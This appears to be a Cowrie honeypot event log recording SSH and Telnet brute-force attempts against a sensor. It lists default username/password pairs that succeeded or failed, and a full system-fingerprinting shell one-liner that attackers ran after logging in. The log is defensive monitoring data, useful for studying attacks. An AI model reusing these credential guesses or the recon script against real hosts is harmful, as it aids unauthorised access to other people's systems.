{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:49:29.133225Z","src_ip":"51.79.164.132","session":"ea95e940c17b"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:49:37.355848Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:49:39.467643Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:49:39.468549Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:49:39.469556Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:49:39.470761Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:49:39.472615Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:49:39.473481Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:49:39.474293Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:49:39.475635Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:49:39.476279Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:49:39.476910Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:49:39.477496Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:49:39.478576Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:49:39.479389Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:49:43.177724Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"3.7","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:49:43.178830Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.session.closed","duration":"17.0","message":"Connection lost after 17.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:49:43.180241Z","src_ip":"212.227.235.229","session":"98b88c9b8f12"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":46900,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3261dfddb34","protocol":"ssh","message":"New connection: 51.79.164.132:46900 (1.2.3.4:22) [session: a3261dfddb34]","sensor":"my-vps","timestamp":"2025-08-28T08:49:51.880057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:49:51.988804Z","src_ip":"51.79.164.132","session":"a3261dfddb34"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:49:52.419888Z","src_ip":"51.79.164.132","session":"a3261dfddb34"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-28T08:49:53.820674Z","src_ip":"51.79.164.132","session":"a3261dfddb34"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:49:55.459041Z","src_ip":"51.79.164.132","session":"a3261dfddb34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54046,"dst_ip":"1.2.3.4","dst_port":23,"session":"f86b3aa3e501","protocol":"telnet","message":"New connection: 212.227.125.160:54046 (1.2.3.4:23) [session: f86b3aa3e501]","sensor":"my-vps","timestamp":"2025-08-28T08:49:55.640418Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":53716,"dst_ip":"1.2.3.4","dst_port":22,"session":"239a1525ca69","protocol":"ssh","message":"New connection: 185.93.89.7:53716 (1.2.3.4:22) [session: 239a1525ca69]","sensor":"my-vps","timestamp":"2025-08-28T08:49:56.840597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:49:56.841861Z","src_ip":"185.93.89.7","session":"239a1525ca69"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:49:56.858718Z","src_ip":"185.93.89.7","session":"239a1525ca69"}
{"eventid":"cowrie.login.success","username":"root","password":"index2023","message":"login attempt [root/index2023] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:49:56.915102Z","src_ip":"185.93.89.7","session":"239a1525ca69"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:49:56.935777Z","src_ip":"185.93.89.7","session":"239a1525ca69"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":35240,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9344c6ea0e8","protocol":"ssh","message":"New connection: 185.93.89.7:35240 (1.2.3.4:22) [session: c9344c6ea0e8]","sensor":"my-vps","timestamp":"2025-08-28T08:50:06.482217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:50:06.494608Z","src_ip":"185.93.89.7","session":"c9344c6ea0e8"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:50:06.515909Z","src_ip":"185.93.89.7","session":"c9344c6ea0e8"}
{"eventid":"cowrie.login.success","username":"root","password":"Index2023","message":"login attempt [root/Index2023] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:50:06.557715Z","src_ip":"185.93.89.7","session":"c9344c6ea0e8"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:50:06.576813Z","src_ip":"185.93.89.7","session":"c9344c6ea0e8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52886,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f8825bfef53","protocol":"ssh","message":"New connection: 217.72.205.35:52886 (1.2.3.4:22) [session: 8f8825bfef53]","sensor":"my-vps","timestamp":"2025-08-28T08:50:17.125185Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:50:17.126292Z","src_ip":"217.72.205.35","session":"8f8825bfef53"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":35038,"dst_ip":"1.2.3.4","dst_port":22,"session":"45ed2cef69d9","protocol":"ssh","message":"New connection: 51.79.164.132:35038 (1.2.3.4:22) [session: 45ed2cef69d9]","sensor":"my-vps","timestamp":"2025-08-28T08:50:19.652954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:50:19.765932Z","src_ip":"51.79.164.132","session":"45ed2cef69d9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:50:20.120690Z","src_ip":"51.79.164.132","session":"45ed2cef69d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36799,"dst_ip":"1.2.3.4","dst_port":23,"session":"96a0273ab5fa","protocol":"telnet","message":"New connection: 212.227.235.229:36799 (1.2.3.4:23) [session: 96a0273ab5fa]","sensor":"my-vps","timestamp":"2025-08-28T08:50:20.912831Z"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar123","message":"login attempt [sonar/sonar123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:50:21.593388Z","src_ip":"51.79.164.132","session":"45ed2cef69d9"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:50:23.219364Z","src_ip":"51.79.164.132","session":"45ed2cef69d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56958,"dst_ip":"1.2.3.4","dst_port":22,"session":"96fb10217a3f","protocol":"ssh","message":"New connection: 212.227.125.160:56958 (1.2.3.4:22) [session: 96fb10217a3f]","sensor":"my-vps","timestamp":"2025-08-28T08:50:24.822912Z"}
{"eventid":"cowrie.session.closed","duration":30.573671579360962,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:50:26.214017Z","src_ip":"212.227.125.160","session":"f86b3aa3e501"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:50:31.008226Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:50:31.009191Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.session.closed","duration":13.013086318969727,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:50:33.925816Z","src_ip":"212.227.235.229","session":"96a0273ab5fa"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:50:36.765589Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:50:40.610426Z","src_ip":"212.227.125.160","session":"96fb10217a3f"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( 